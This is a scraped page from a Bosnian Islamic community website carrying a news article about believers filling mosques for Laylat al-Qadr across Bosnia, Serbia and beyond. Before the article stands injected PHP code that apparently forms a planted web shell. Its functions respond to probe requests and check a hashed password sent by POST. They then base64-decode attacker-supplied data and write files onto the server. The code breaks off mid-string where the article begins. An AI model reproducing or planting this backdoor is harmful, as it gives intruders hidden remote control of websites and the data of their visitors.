function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Vjernici napunili džamije u noći Lejletu-l-Kadr - Medžlis Islamske zajednice Bijeljina

Vjernici napunili džamije u noći Lejletu-l-Kadr

Vjernici napunili džamije u noći Lejletu-l-Kadr

Muslimani širom svijeta večera su dočekali najodabraniju noć u godini, noć Božije milosti u kojoj je počela objava Kur'ana. Džamije su bile premale da prime brojne vjernike koji su Lejletu-l-kadr dočekali uz dove i traženje oprosta grijeha.
Centralna svečanost održana je u Gazi Husrev-begovoj džamiji u Sarajevu, u kojoj se poslije teravih-namaza vjernicima obratio i reisu-l-ulema Islamske zajednice u BiH Husein Kavazović.

On je podsjetio na važnost ove noći i pozvao vjernike da upute dove za muslimane u Siriji i Egiptu koji se suočavaju sa ratom i nemirima u svojim zemljama. Prisutni vjernici imali su priliku poslušati prigodna predavanja, učenje Kur'ana i ilahija. I u drugim džamijama u BiH su organizovani progodni programi.

Nakon šest godina teravija u tuzlanskoj Poljskoj džamiji

Poslije šest godina pauze večeras je u Turalibegovoj džamiji u Tuzli, poznatoj kao Poljska džamija, klanjan teravih-namaz u povodu 27. noći ramazana. Namaz je klanjan i u novootvorenoj džamiji u naselju Tušanj, ali i u svim drugim džamija tuzlanskog medžlisa.

Neposredno nakon akšam namaza i iftara rijeke vjernika slijevale su se u tuzlanske džamije, a mubarek noć je obilježena I’tikafom, zikrom, učenjem Kur’ana, dovom i drugim ibadetima.

Vjernici koje smo zatekli ispred Džindićke džamije, najstarije u Tuzli, kažu nam kako će u mubarek noći dovama tražiti dobro zdravlje za svoju porodicu, rodbinu, komšije…

“Svaka noć u ramazanu je posebna, ali je 27. noć posebnija od svih. Cijeli dan sam proveo u ibadetu, a sretan sam kad vidim da se dosta mladih okreću ka vjeri”, kazao nam je jedan od stalnih posjetioca Džindićke džamije.

U ovoj mubarek noći, prema islamskom vjerovanju, meleci se spuštaju na zemlju, a vjernici se za Božiju milost mole do duboko u noć.

Zenički imam: Nemojte provesti ovu noć u dangubljenju

U džematima u Zenici nakon klanjanja teravih-namaza organizovana su predavanja o značaju i vrijednosti noći Lejletu-l-kadr, a centralna svečanost upriličena je u Kočevskoj džamiji.

Uz učenje ilahija i odlomaka iz Kur'ana vjernicima se obratio imam Čaršijske džamije Enes ef. Beganović i govorio o vrijednostima ove noći, te kako da na najbolji mogući način iskoriste njene blagodati.

“Ova noć je vrednija od svih noći i u ovoj noći su svi meleki na našem nebeskom svodu gdje čekaju da prenesu naše dove i molbe Gospodaru. Stoga, nemojte provesti ovu noć u dangubljenju, iskoristite je maksimalno klanjajući, učeći Kur'an, provedite je u ibadetu i izađite iz nje bez grijeha”, kazao je Beganović.

U džematu Bijele džamije u zeničkom naselju Radakovo tačno u ponoć klanjan je noćni namaz kome je prisustvovao veliki broj vjernika. U još nekoliko džemata širom Zenice je klanjan ovaj namaz, dok će u nekim džematima nakon sehura biti klanjan i tespih-namaz.

Lejletu-l-kadr u zemljama regije

Vjernici sa užeg područja prijestonice Srbije su klanjanjem teravih-namaza u Bajrakli džamiji kao ostalih 15 mesdžida na području svih opština Beograda masovno obılježili 27. noć mjeseca ramazana. Muslimani u ostalim gradovima na području Srbije, Nišu, Šapcu, Kragujevcu, kao i u Novom Sadu i džamiji u Subotici takođe su u velikom broju obavili noćnu molitvu.

U Novom Pazaru je u centru grada na Trgu Isa Bega organizovan noćni namaz na otvorenom. Na Kosovu je centralno obilježavanje Lejlet-ul-kadra ili Velike noći održano u Fatih Sultan Mehmet džamiji, najvećoj džamiji u Prištini.

U džamiji Mustafa-paše u Skoplju vaz je držao glavni imam ove džamije Miftar Islami.

Lejletu-l-kadr obilježili su muslimani diljem svijeta. Ova mubarek noć napunila je spomenike islamske kulture poput Sultan Ahmetove džamije u Istanbulu, ali i Poslanikove džamije u Medini.

Muslimani u Indiji, Indoneziji, Iraku, Afganistanu, Azerbejdžanu, ali i SAD-u i većini evropskih zemalja večeras obilježavaju noć za koju, slijedeći uputu iz Kur'ana, vjeruju da je vrednija od hiljadu drugih mjeseci.
Izvor: Klix.ba/Anadolija